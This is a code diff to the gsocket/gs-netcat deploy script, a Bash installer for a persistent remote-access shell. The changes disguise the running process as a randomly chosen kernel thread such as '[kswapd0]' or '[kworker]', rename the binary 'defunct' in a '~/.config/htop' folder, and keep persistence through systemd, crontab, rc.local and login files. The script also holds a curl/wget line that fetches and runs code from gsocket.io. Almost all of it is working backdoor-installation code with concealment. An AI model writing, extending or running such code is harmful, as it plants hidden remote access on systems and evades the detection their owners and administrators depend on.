@@ -40,7 +40,10 @@
 # GS_DSTDIR="/tmp/foobar/blah"
 #		- Specify custom installation directory
 # GS_HIDDEN_NAME="-bash"
-#       - Specify custom hidden name for process
+#       - Specify custom hidden name for process, default is [kcached]
+# GS_BIN_HIDDEN_NAME="gs-dbus"
+#       - Specify custom name for binary on filesystem (default is gs-dbus)
+#       - Set to GS_HIDDEN_NAME if GS_HIDDEN_NAME is specified.
 # GS_DL=wget
 #       - Command to use for download. =wget or =curl.
 # GS_TG_TOKEN=
@@ -62,12 +65,19 @@
 #       - Guess what...
 
 # Global Defines
-URL_BASE="https://gsocket.io"
-[[ -n $GS_URL_BASE ]] && URL_BASE="${GS_URL_BASE}"
-URL_BIN="${URL_BASE}/bin"
-URL_DEPLOY="${URL_BASE}/x"
-[[ -n $GS_URL_BIN ]] && URL_BIN="${GS_URL_BIN}"
-[[ -n $GS_URL_DEPLOY ]] && URL_DEPLOY="${GS_URL_DEPLOY}"
+URL_BASE_CDN="https://cdn.gsocket.io"
+URL_BASE_X="https://gsocket.io"
+[[ -n $GS_URL_BASE ]] && {
+	URL_BASE_CDN="${GS_URL_BASE}"
+	URL_BASE_X="${GS_URL_BASE}"
+}
+URL_BIN="${URL_BASE_CDN}/bin"       # mini & stripped version
+URL_BIN_FULL="${URL_BASE_CDN}/full" # full version (with -h working)
+[[ -n $GS_URL_BIN ]] && {
+	URL_BIN="${GS_URL_BIN}"
+	URL_BIN_FULL="$URL_BIN"
+}
+[[ -n $GS_URL_DEPLOY ]] && URL_DEPLOY="${GS_URL_DEPLOY}" || URL_DEPLOY="${URL_BASE_X}/x"
 
 # STUBS for deploy_server.sh to fill out:
 gs_deploy_webhook=
@@ -110,15 +120,33 @@ unset msg
 
 DL_CRL="bash -c \"\$(curl -fsSL $URL_DEPLOY)\""
 DL_WGT="bash -c \"\$(wget -qO- $URL_DEPLOY)\""
-BIN_HIDDEN_NAME_DEFAULT="gs-dbus"
-# Can not use '[kcached/0]'. Bash without bashrc would use "/0] $" as prompt. 
-PROC_HIDDEN_NAME_DEFAULT="[kcached]"
+BIN_HIDDEN_NAME_DEFAULT="defunct"
+# Can not use '[kcached/0]'. Bash without bashrc shows "/0] $" as prompt. 
+proc_name_arr=("[kstrp]" "[watchdogd]" "[ksmd]" "[kswapd0]" "[card0-crtc8]" "[mm_percpu_wq]" "[rcu_preempt]" "[kworker]" "[raid5wq]" "[slub_flushwq]" "[netns]" "[kaluad]")
+# Pick a process name at random
+PROC_HIDDEN_NAME_DEFAULT="${proc_name_arr[$((RANDOM % ${#proc_name_arr[@]}))]}"
+for str in "${proc_name_arr[@]}"; do
+	PROC_HIDDEN_NAME_RX+="|$(echo "$str" | sed 's/[^a-zA-Z0-9]/\\&/g')"
+done
+PROC_HIDDEN_NAME_RX="${PROC_HIDDEN_NAME_RX:1}"
+
+# PROC_HIDDEN_NAME_DEFAULT="[rcu_preempt]"
+# ~/.config/<NAME>
+CONFIG_DIR_NAME="htop"
+
+# Names for 'uninstall' (including names from previous versions)
+BIN_HIDDEN_NAME_RM=("$BIN_HIDDEN_NAME_DEFAULT" "gs-dbus" "gs-db")
+CONFIG_DIR_NAME_RM=("$CONFIG_DIR_NAME" "dbus")
+
 [[ -t 1 ]] && {
 	CY="\033[1;33m" # yellow
+	CDY="\033[0;33m" # yellow
 	CG="\033[1;32m" # green
 	CR="\033[1;31m" # red
 	CDR="\033[0;31m" # red
+	CB="\033[1;34m" # blue
 	CC="\033[1;36m" # cyan
+	CDC="\033[0;36m" # cyan
 	CM="\033[1;35m" # magenta
 	CN="\033[0m"    # none
 	CW="\033[1;37m"
@@ -413,7 +441,8 @@ xmv()
 	src="$1"
 	dst="$2"
 
-	xcp "$src" "$dst"
+	[[ -e "$dst" ]] && xrm "$dst"
+	xcp "$src" "$dst" || return
 	xrm "$src"
 	true
 }
@@ -478,7 +507,7 @@ try_dstdir()
 	cp "$ebin" "$trybin" &>/dev/null || { rm -f "${trybin:?}"; return; }
 	chmod 700 "$trybin"
 
-	# Between 28th April and end of May we accidentially
+	# Between 28th April and end of May 2020 we accidentially
 	# over wrote /bin/true with gs-bd binary. Thus we use -g
 	# to make true, id and gs-bd return true (in case it's gs-bs).
 	"${trybin}" -g &>/dev/null || { rm -f "${trybin:?}"; return 104; } # FAILURE
@@ -503,7 +532,7 @@ init_dstbin()
 
 	# Try user installation
 	[[ ! -d "${GS_PREFIX}${HOME}/.config" ]] && xmkdir "${GS_PREFIX}${HOME}/.config"
-	try_dstdir "${GS_PREFIX}${HOME}/.config/dbus" && return
+	try_dstdir "${GS_PREFIX}${HOME}/.config/${CONFIG_DIR_NAME}" && return
 
 	# Try current working directory
 	try_dstdir "${PWD}" && { IS_DSTBIN_CWD=1; return; }
@@ -566,6 +595,7 @@ init_vars()
 {
 	# Select binary
 	local arch
+	local osname
 	arch=$(uname -m)
 
 	if [[ -z "$HOME" ]]; then
@@ -584,12 +614,15 @@ init_vars()
 			OSTYPE="FreeBSD"
 		elif [[ "$osname" == *Darwin* ]]; then
 			OSTYPE="darwin22.0"
+		elif [[ "$osname" == *OpenBSD* ]]; then
+			OSTYPE="openbsd7.3"
 		elif [[ "$osname" == *Linux* ]]; then
 			OSTYPE="linux-gnu"
 		fi
 	}
 
 	unset OSARCH
+	unset SRC_PKG
 	# User supplied OSARCH
 	[[ -n "$GS_OSARCH" ]] && OSARCH="$GS_OSARCH"
 
@@ -597,35 +630,63 @@ init_vars()
 		if [[ $OSTYPE == *linux* ]]; then 
 			if [[ "$arch" == "i686" ]] || [[ "$arch" == "i386" ]]; then
 				OSARCH="i386-alpine"
+				SRC_PKG="gs-netcat_mini-linux-i686"
+			elif [[ "$arch" == *"armv6"* ]]; then
+				OSARCH="arm-linux"
+				SRC_PKG="gs-netcat_mini-linux-armv6"
+			elif [[ "$arch" == *"armv7l" ]]; then
+				OSARCH="arm-linux"
+				SRC_PKG="gs-netcat_mini-linux-armv7l"
 			elif [[ "$arch" == *"armv"* ]]; then
 				OSARCH="arm-linux" # RPI-Zero / RPI 4b+
+				SRC_PKG="gs-netcat_mini-linux-arm"
 			elif [[ "$arch" == "aarch64" ]]; then
 				OSARCH="aarch64-linux"
+				SRC_PKG="gs-netcat_mini-linux-aarch64"
 			elif [[ "$arch" == "mips64" ]]; then
 				OSARCH="mips64-alpine"
+				SRC_PKG="gs-netcat_mini-linux-mips64"
 				# Go 32-bit if Little Endian even if 64bit arch
-				is_le && OSARCH="mipsel32-alpine"
+				is_le && {
+					OSARCH="mipsel32-alpine"
+					SRC_PKG="gs-netcat_mini-linux-mipsel"
+				}
 			elif [[ "$arch" == *mips* ]]; then
 				OSARCH="mips32-alpine"
-				is_le && OSARCH="mipsel32-alpine"
+				SRC_PKG="gs-netcat_mini-linux-mips32"
+				is_le && {
+					OSARCH="mipsel32-alpine"
+					SRC_PKG="gs-netcat_mini-linux-mipsel"
+				}
 			fi
 		elif [[ $OSTYPE == *darwin* ]]; then
 			if [[ "$arch" == "arm64" ]]; then
 				OSARCH="x86_64-osx" # M1
+				## FIXME: really needs M3 here..
+				SRC_PKG="gs-netcat_mini-macOS-x86_64"
 				# OSARCH="arm64-osx" # M1
 			else
 				OSARCH="x86_64-osx"
+				SRC_PKG="gs-netcat_mini-macOS-x86_64"
 			fi
-		elif [[ $OSTYPE == *FreeBSD* ]]; then
+		elif [[ ${OSTYPE,,} == *freebsd* ]]; then
 				OSARCH="x86_64-freebsd"
-		elif [[ $OSTYPE == *cygwin* ]]; then
+				SRC_PKG="gs-netcat_mini-freebsd-x86_64"
+		elif [[ ${OSTYPE,,} == *openbsd* ]]; then
+				OSARCH="x86_64-openbsd"
+				SRC_PKG="gs-netcat_mini-openbsd-x86_64"
+		elif [[ ${OSTYPE,,} == *cygwin* ]]; then
 			OSARCH="i686-cygwin"
 			[[ "$arch" == "x86_64" ]] && OSARCH="x86_64-cygwin"
 		# elif [[ $OSTYPE == *gnu* ]] && [[ "$(uname -v)" == *Hurd* ]]; then
 				# OSARCH="i386-hurd" # debian-hurd
 		fi
 
-		[[ -z "$OSARCH" ]] && OSARCH="x86_64-alpine" # Default: Try Alpine(muscl libc) 64bit
+		[[ -z "$OSARCH" ]] && {
+			# Default: Try Alpine(muscl libc) 64bit
+			OSARCH="x86_64-alpine"
+			SRC_PKG="gs-netcat_mini-linux-x86_64"
+		}
 	fi
 
 	# Docker does not set USER
@@ -636,7 +697,7 @@ init_vars()
 	try_encode "base64" "base64 -w0" "base64 -d"
 	try_encode "xxd" "xxd -ps -c1024" "xxd -r -ps"
 	DEBUGF "ENCODE_STR='${ENCODE_STR}'"
-	SRC_PKG="gs-netcat_${OSARCH}.tar.gz"
+	[[ -z "$SRC_PKG" ]] && SRC_PKG="gs-netcat_${OSARCH}.tar.gz"
 
 	# OSX's pkill matches the hidden name and not the original binary name.
 	# Because we hide as '-bash' we can not use pkill all -bash.
@@ -668,10 +729,24 @@ init_vars()
 	}
 
 	# Defaults
-	BIN_HIDDEN_NAME="${BIN_HIDDEN_NAME_DEFAULT}"
+	# Binary file is called gs-dbus or set to same name as Process name if
+	# GS_HIDDEN_NAME is set. Can be overwritten with GS_BIN_HIDDEN_NAME=
+	if [[ -n $GS_BIN_HIDDEN_NAME ]]; then
+		BIN_HIDDEN_NAME="${GS_BIN_HIDDEN_NAME}"
+		BIN_HIDDEN_NAME_RM+=("$GS_BIN_HIDDEN_NAME")
+	else
+		BIN_HIDDEN_NAME="${GS_HIDDEN_NAME:-$BIN_HIDDEN_NAME_DEFAULT}"
+	fi
+	BIN_HIDDEN_NAME_RX=$(echo "$BIN_HIDDEN_NAME" | sed 's/[^a-zA-Z0-9]/\\&/g')
 	
-	SEC_NAME="${BIN_HIDDEN_NAME_DEFAULT}.dat"
-	PROC_HIDDEN_NAME="${GS_HIDDEN_NAME:-$PROC_HIDDEN_NAME_DEFAULT}"
+	SEC_NAME="${BIN_HIDDEN_NAME}.dat"
+	if [[ -n $GS_HIDDEN_NAME ]]; then
+		PROC_HIDDEN_NAME="${GS_HIDDEN_NAME}"
+		PROC_HIDDEN_NAME_RX+="|$(echo "$GS_HIDDEN_NAME" | sed 's/[^a-zA-Z0-9]/\\&/g')"
+	else
+		PROC_HIDDEN_NAME="$PROC_HIDDEN_NAME_DEFAULT"
+	fi
+
 	SERVICE_HIDDEN_NAME="${BIN_HIDDEN_NAME}"
 
 	RCLOCAL_DIR="${GS_PREFIX}/etc"
@@ -707,11 +782,14 @@ init_vars()
 	[[ ! -d "${CRONTAB_DIR}" ]] && CRONTAB_DIR="${GS_PREFIX}/etc/cron/crontabs"
 
 	local pids
-	pids="$(pgrep "${BIN_HIDDEN_NAME}" 2>/dev/null)"
-	# OSX's pgrep works on argv[0] proc-name
-	[[ -z $pids ]] && pids="$(pgrep "${PROC_HIDDEN_NAME//[^[:alnum:]]}" 2>/dev/null)"
+	# Linux 'pgrep kswapd0' would match _binary_ kswapd0 even if argv[0] is '[rcu_preempt]'
+	# and also matches kernel process '[kwapd0]'.
+	pids="$(pgrep "${BIN_HIDDEN_NAME_RX}" 2>/dev/null)"
+	# OSX's pgrep works on argv[0] proc-name:
+	[[ -z $pids ]] && pids="$(pgrep "(${PROC_HIDDEN_NAME_RX})" 2>/dev/null)"
 
 	[[ -n $pids ]] && OLD_PIDS="${pids//$'\n'/ }" # Convert multi line into single line
+	unset pids
 
 	# DL_CMD is used for help output of how to uninstall
 	if [[ -n "$GS_USELOCAL" ]]; then
@@ -731,12 +809,13 @@ init_vars()
 	if [[ "$DL_CMD" == "$DL_CRL" ]]; then
 		IS_USE_CURL=1
 		### Note: need -S (--show-errors) to process 404 for CF webhooks.
-		DL=("curl" "-fsSL" "--connect-timeout" "7" "-m30" "--retry" "3")
+		DL=("curl" "-fsSL" "--connect-timeout" "7" "-m900" "--retry" "3")
 		[[ -n $GS_DEBUG ]] && DL+=("-v")
 		[[ -n $GS_NOCERTCHECK ]] && DL+=("-k")
 	elif [[ "$DL_CMD" == "$DL_WGT" ]]; then
 		IS_USE_WGET=1
 		### Note: Dont use -q: Need errors to process 404 for CF webhooks
+		# Read-timeout is 900 seconds by default.
 		DL=("wget" "-O-" "--connect-timeout=7" "--dns-timeout=7")
 		[[ -n $GS_NOCERTCHECK ]] && DL+=("--no-check-certificate")
 
@@ -745,6 +824,11 @@ init_vars()
 	fi
 
 	[[ $SHELL == *"nologin"* ]] && unset SHELL
+	[[ $SHELL == *"jail"* ]] && unset SHELL  # /usr/local/cpanel/bin/jailshell
+	[[ $SHELL == *"noshell"* ]] && unset SHELL  #  /usr/local/cpanel/bin/noshell
+	[[ $SHELL == *"/dev/null"* ]] && unset SHELL
+	# Test that shell is a good shell.
+	[[ -n $SHELL ]] && [[ "$("$SHELL" -c "echo TRUE" 2>/dev/null)" != "TRUE" ]] && unset SHELL
 
 	DEBUGF "OLD_PIDS='$OLD_PIDS'"
 	DEBUGF "SRC_PKG=$SRC_PKG"
@@ -833,9 +917,8 @@ uninstall_rmdir()
 	[[ -z "$1" ]] && return
 	[[ ! -d "$1" ]] && return # return if file does not exist
 
-	xrmdir "$1" 2>/dev/null || return
-
 	echo "Removing $1..."
+	xrmdir "$1" 2>/dev/null
 }
 
 uninstall_rc()
@@ -882,60 +965,66 @@ uninstall_service()
 # Rather important function especially when testing and developing this...
 uninstall()
 {
+	local hn
+	local fn
+	local cn
+	for hn in "${BIN_HIDDEN_NAME_RM[@]}"; do
+		for cn in "${CONFIG_DIR_NAME_RM[@]}"; do
+			uninstall_rm "${GS_PREFIX}${HOME}/.config/${cn}/${hn}"
+			uninstall_rm "${GS_PREFIX}${HOME}/.config/${cn}/${hn}.dat"  # SEC_NAME
+		done
+		uninstall_rm "${GS_PREFIX}/usr/bin/${hn}"
+		uninstall_rm "/dev/shm/${hn}"
+		uninstall_rm "/tmp/.gsusr-${UID}/${hn}"
+		uninstall_rm "${PWD}/${hn}"
 
-	uninstall_rm "${GS_PREFIX}${HOME}/.config/dbus/${BIN_HIDDEN_NAME}"
-	uninstall_rm "${GS_PREFIX}${HOME}/.config/dbus/gs-bd"
-	uninstall_rm "${GS_PREFIX}/usr/bin/${BIN_HIDDEN_NAME}"
-	uninstall_rm "${GS_PREFIX}/usr/bin/gs-bd"
-	uninstall_rm "/dev/shm/${BIN_HIDDEN_NAME}"
-	uninstall_rm "/tmp/.gsusr-${UID}/${BIN_HIDDEN_NAME}"
+		uninstall_rm "${RCLOCAL_DIR}/${hn}.dat"  # SEC_NAME
+		uninstall_rm "${GS_PREFIX}/usr/bin/${hn}.dat" # SEC_NAME
 
-	uninstall_rm "${RCLOCAL_DIR}/${SEC_NAME}"
-	uninstall_rm "${RCLOCAL_DIR}/gs-bd.dat" #OLD
-	uninstall_rm "${GS_PREFIX}${HOME}/.config/dbus/${SEC_NAME}"
-	uninstall_rm "${GS_PREFIX}${HOME}/.config/dbus/gs-bd.dat" #OLD
-	uninstall_rm "${GS_PREFIX}/usr/bin/${SEC_NAME}"
-	uninstall_rm "${GS_PREFIX}/usr/bin/gs-bd.dat" #OLD
-	uninstall_rm "/dev/shm/${SEC_NAME}"
-	uninstall_rm "/tmp/.gsusr-${UID}${SEC_NAME}"
+		uninstall_rm "/dev/shm/${hn}.dat" # SEC_NAME
+		uninstall_rm "/tmp/.gsusr-${UID}${hn}.dat" # SEC_NAME
 
-	uninstall_rmdir "${GS_PREFIX}${HOME}/.config/dbus"
+		uninstall_rm "${PWD}/${hn}.dat" # SEC_NAME
+
+		# Remove from login script
+		for fn in ".bash_profile" ".bash_login" ".bashrc" ".zshrc" ".profile"; do
+			uninstall_rc "${GS_PREFIX}${HOME}/${fn}" "${hn}"
+		done 
+		uninstall_rc "${GS_PREFIX}/etc/rc.local" "${hn}"
+
+		uninstall_service "${SERVICE_DIR}" "${hn}" # SERVICE_HIDDEN_NAME
+
+		## Systemd's gs-dbus.dat
+		uninstall_rm "${SERVICE_DIR}/${hn}.dat"  # SYSTEMD_SEC_FILE / SEC_NAME
+	done
+
+	for cn in "${CONFIG_DIR_NAME_RM[@]}"; do
+		uninstall_rmdir "${GS_PREFIX}${HOME}/.config/${cn}"
+	done
 	uninstall_rmdir "${GS_PREFIX}${HOME}/.config"
 	uninstall_rmdir "/tmp/.gsusr-${UID}"
 
-	uninstall_rm "/dev/shm/${BIN_HIDDEN_NAME}"
 	uninstall_rm "${TMPDIR}/${SRC_PKG}"
 	uninstall_rm "${TMPDIR}/._gs-netcat" # OLD
 	uninstall_rmdir "${TMPDIR}"
 
-	uninstall_rm "${PWD}/${BIN_HIDDEN_NAME}"
-	uninstall_rm "${PWD}/${SEC_NAME}"
-
-	# Remove from login script
-	for fn in ".bash_profile" ".bash_login" ".bashrc" ".zshrc" ".profile"; do
-		uninstall_rc "${GS_PREFIX}${HOME}/${fn}" "${BIN_HIDDEN_NAME}"
-		uninstall_rc "${GS_PREFIX}${HOME}/${fn}" "gs-bd" #OLD
-	done 
-	uninstall_rc "${GS_PREFIX}/etc/rc.local" "${BIN_HIDDEN_NAME}" 
-	uninstall_rc "${GS_PREFIX}/etc/rc.local" "gs-bd" #OLD
-
 	# Remove crontab
-	if [[ ! $OSTYPE == *darwin* ]]; then
-		if crontab -l 2>/dev/null | grep -F -e "$BIN_HIDDEN_NAME" -e "gs-bd" &>/dev/null; then
+	unset regex
+	regex="dummy-not-exist"
+	for str in "${BIN_HIDDEN_NAME_RM[@]}"; do
+		# Escape regular exp special characters
+		regex+="|$(echo "$str" | sed 's/[^a-zA-Z0-9]/\\&/g')"
+	done
+	if [[ $OSTYPE != *darwin* ]] && command -v crontab >/dev/null; then
+		ct="$(crontab -l 2>/dev/null)"
+		[[ "$ct" =~ ($regex) ]] && {
 			[[ $UID -eq 0 ]] && mk_file "${CRONTAB_DIR}/root"
-			command -v crontab >/dev/null && crontab -l 2>/dev/null | grep -v -F -- "${BIN_HIDDEN_NAME}" | grep -v -F -- "gs-bd" | crontab - 2>/dev/null
-		fi
+			echo "$ct" | grep -v -E -- "($regex)" | crontab - 2>/dev/null
+		}
 	fi
 
-	# Remove systemd service
-	uninstall_service "${SERVICE_DIR}" "${SERVICE_HIDDEN_NAME}"
-	uninstall_service "/etc/systemd/system" "gs-bd" #OLD
 	[[ $UID -eq 0 ]] && systemctl daemon-reload 2>/dev/null
 
-	## Systemd's gs-dbus.dat
-	uninstall_rm "${SYSTEMD_SEC_FILE}"
-	uninstall_rm "/etc/systemd/system/gs-bd.dat" #OLD
-
 	echo -e "${CG}Uninstall complete.${CN}"
 	echo -e "--> Use ${CM}${KL_CMD:-pkill} ${BIN_HIDDEN_NAME}${systemd_kill_cmd}${CN} to terminate all running shells."
 	exit_code 0
@@ -975,8 +1064,17 @@ WARN_EXECFAIL_SET()
 WARN_EXECFAIL()
 {
 	[[ -z "$WARN_EXECFAIL_MSG" ]] && return
-	echo -e "--> Please send this output to ${CC}root@proton.thc.org${CN} to get it fixed."
-	echo -e "--> ${WARN_EXECFAIL_MSG}"
+	[[ -n "$ERR_LOG" ]] && echo -e "${CDR}${ERR_LOG}${CN}"
+	echo -en "${CDR}"
+	ls -al "${DSTBIN}"
+	echo -e "${CN}--> ${WARN_EXECFAIL_MSG}
+--> GS_OSARCH=${OSARCH}
+--> ${CDC}GS_DSTDIR=${DSTBIN%/*}${CN}
+--> Try to set ${CDC}export GS_DEBUG=1${CN} and deploy again.
+--> Please send that output to ${CM}root@proton.thc.org${CN} to get it fixed.
+--> Alternatively, try the static binary from
+--> ${CB}https://github.com/hackerschoice/gsocket/releases${CN}
+--> ${CDC}chmod 755 gs-netcat; ./gs-netcat -ilv${CN}."
 }
 
 HOWTO_CONNECT_OUT()
@@ -1043,7 +1141,7 @@ After=network.target
 [Service]
 Type=simple
 Restart=always
-RestartSec=10
+RestartSec=300
 WorkingDirectory=/root
 ExecStart=/bin/bash -c \"${ENV_LINE[*]}GS_ARGS='-k $SYSTEMD_SEC_FILE -ilq' exec -a '${PROC_HIDDEN_NAME}' '${DSTBIN}'\"
 
@@ -1232,8 +1330,6 @@ dl_ssl()
 # Download $1 and save it to $2
 dl()
 {
-	[[ -s "$2" ]] && return
-
 	# Debugging / testing. Use local package if available
 	if [[ -n "$GS_USELOCAL" ]]; then
 		[[ -f "../packaging/gsnc-deploy-bin/${1}" ]] && xcp "../packaging/gsnc-deploy-bin/${1}" "${2}" 2>/dev/null && return
@@ -1241,7 +1337,12 @@ dl()
 		[[ -f "${1}" ]] && xcp "${1}" "${2}" 2>/dev/null && return
 		FAIL_OUT "GS_USELOCAL set but deployment binaries not found (${1})..."
 		errexit
-	elif [[ -n $IS_USE_CURL ]]; then
+	fi
+
+	# Delete. Maybe previous download failed.
+	[[ -s "$2" ]] && rm -f "${2:?}"
+
+	if [[ -n $IS_USE_CURL ]]; then
 		dl_ssl "-k" "certificate problem" "${DL[@]}" "${URL_BIN}/${1}" "--output" "${2}"
 	elif [[ -n $IS_USE_WGET ]]; then
 		dl_ssl "--no-check-certificate" "is not trusted" "${DL[@]}" "${URL_BIN}/${1}" "-O" "${2}"
@@ -1281,16 +1382,21 @@ gs_access()
 test_bin()
 {
 	local bin
-	local err_log
 	unset IS_TESTBIN_OK
 
 	bin="$1"
 
 	# Try to execute the binary
-	GS_OUT=$("$bin" -g 2>/dev/null)
+	unset ERR_LOG
+	GS_OUT=$("$bin" -g 2>&1)
 	ret=$?
-	# 126 - Exec format error
-	[[ -z "$GS_OUT" ]] && { FAIL_OUT; ERR_LOG="wrong binary"; WARN_EXECFAIL_SET "$ret" "wrong binary"; return; }
+	[[ $ret -ne 0 ]] && {
+		# 126 - Exec format error
+		FAIL_OUT
+		ERR_LOG="$GS_OUT"
+		WARN_EXECFAIL_SET "$ret" "wrong binary"
+		return
+	}
 
 	# Use randomly generated secret unless it's set already (X=)
 	[[ -z $GS_SECRET ]] && GS_SECRET="$GS_OUT"
@@ -1415,28 +1521,31 @@ try_network()
 	WARN_EXECFAIL
 }
 
-# try <osarch>
+# try <osarch> <srcpackage>
 try()
 {
-	local osarch
-	local src_pkg
-	osarch="$1"
+	local osarch="$1"
+	local src_pkg="$2"
 
-	src_pkg="gs-netcat_${osarch}.tar.gz"
+	[[ -z "$src_pkg" ]] && src_pkg="gs-netcat_${osarch}.tar.gz"
 	echo -e "--> Trying ${CG}${osarch}${CN}"
 	# Download binaries
 	echo -en "Downloading binaries.................................................."
-	dl "gs-netcat_${osarch}.tar.gz" "${TMPDIR}/${src_pkg}"
+	dl "${src_pkg}" "${TMPDIR}/${src_pkg}"
 	OK_OUT
 
 	echo -en "Unpacking binaries...................................................."
-	# Unpack (suppress "tar: warning: skipping header 'x'" on alpine linux
-	(cd "${TMPDIR}" && tar xfz "${src_pkg}" 2>/dev/null) || { FAIL_OUT "unpacking failed"; errexit; }
-	[[ -f "${TMPDIR}/._gs-netcat" ]] && rm -f "${TMPDIR}/._gs-netcat" # from docker???
-	[[ -n $GS_USELOCAL_GSNC ]] && {
-		[[ -f "$GS_USELOCAL_GSNC" ]] || { FAIL_OUT "Not found: ${GS_USELOCAL_GSNC}"; errexit; }
-		xcp "${GS_USELOCAL_GSNC}" "${TMPDIR}/gs-netcat"
-	}
+	if [[ "${src_pkg}" == *.tar.gz ]]; then
+		# Unpack (suppress "tar: warning: skipping header 'x'" on alpine linux
+		(cd "${TMPDIR}" && tar xfz "${src_pkg}" 2>/dev/null) || { FAIL_OUT "unpacking failed"; errexit; }
+		[[ -f "${TMPDIR}/._gs-netcat" ]] && rm -f "${TMPDIR}/._gs-netcat" # from docker???
+		[[ -n $GS_USELOCAL_GSNC ]] && {
+			[[ -f "$GS_USELOCAL_GSNC" ]] || { FAIL_OUT "Not found: ${GS_USELOCAL_GSNC}"; errexit; }
+			xcp "${GS_USELOCAL_GSNC}" "${TMPDIR}/gs-netcat"
+		}
+	else
+		mv "${TMPDIR}/${src_pkg}" "${TMPDIR}/gs-netcat"
+	fi
 	OK_OUT
 
 	echo -en "Copying binaries......................................................"
@@ -1454,24 +1563,6 @@ try()
 	rm -f "${TMPDIR}/${src_pkg:?}"
 }
 
-# Download the gs-netcat_any-any.tar.gz and try all of the containing
-# binaries and fail hard if none could be found.
-try_any()
-{
-	targets="x86_64-alpine i386-alpine aarch64-linux arm-linux x86_64-osx x86_64-cygwin i686-cygwin mips32-alpine mipsel32-alpine x86_64-freebsd"
-	for osarch in $targets; do
-		[[ "$osarch" == "$OSARCH" ]] && continue # Skip the default OSARCH (already tried)
-		try "$osarch"
-		[[ -n "$IS_TESTBIN_OK" ]] && break
-	done
-
-	if [[ -n "$IS_TESTBIN_OK" ]]; then
-		echo -e >&2 "--> ${CY}Installation did not go as smooth as it should have.${CN}"
-	else
-		[[ -n "$ERR_LOG" ]] && echo >&2 "$ERR_LOG"
-	fi
-}
-
 gs_start_systemd()
 {
 	# HERE: It's systemd
@@ -1523,7 +1614,7 @@ gs_start()
 			# HERE: sec.dat has been updated
 			OK_OUT
 			WARN "More than one ${PROC_HIDDEN_NAME} is running."
-			echo -e "--> You may want to check: ${CM}ps -elf|grep -F -- '${PROC_HIDDEN_NAME}'${CN}"
+			echo -e "--> You may want to check: ${CM}ps -elf|grep -E -- '(${PROC_HIDDEN_NAME_RX})'${CN}"
 			[[ -n $OLD_PIDS ]] && echo -e "--> or terminate the old ones: ${CM}kill ${OLD_PIDS}${CN}"
 		fi
 	else
@@ -1552,6 +1643,7 @@ init_setup
 [[ -n "$X" ]] && GS_SECRET_X="$X"
 
 if [[ -z $S ]]; then
+	# HERE: S= is NOT set
 	if [[ $UID -eq 0 ]]; then
 		gs_secret_reload "$SYSTEMD_SEC_FILE" 
 		gs_secret_reload "$RCLOCAL_SEC_FILE" 
@@ -1567,11 +1659,12 @@ if [[ -z $S ]]; then
 	DEBUGF "GS_SECRET=$GS_SECRET (F=${GS_SECRET_FROM_FILE}, X=${GS_SECRET_X})"
 else
 	GS_SECRET="$S"
+	URL_BIN="$URL_BIN_FULL"
 fi
 
-try "$OSARCH"
+try "$OSARCH" "$SRC_PKG"
 
-[[ -z "$GS_OSARCH" ]] && [[ -z "$IS_TESTBIN_OK" ]] && try_any
+# [[ -z "$GS_OSARCH" ]] && [[ -z "$IS_TESTBIN_OK" ]] && try_any
 WARN_EXECFAIL
 [[ -z "$IS_TESTBIN_OK" ]] && errexit "None of the binaries worked."
 
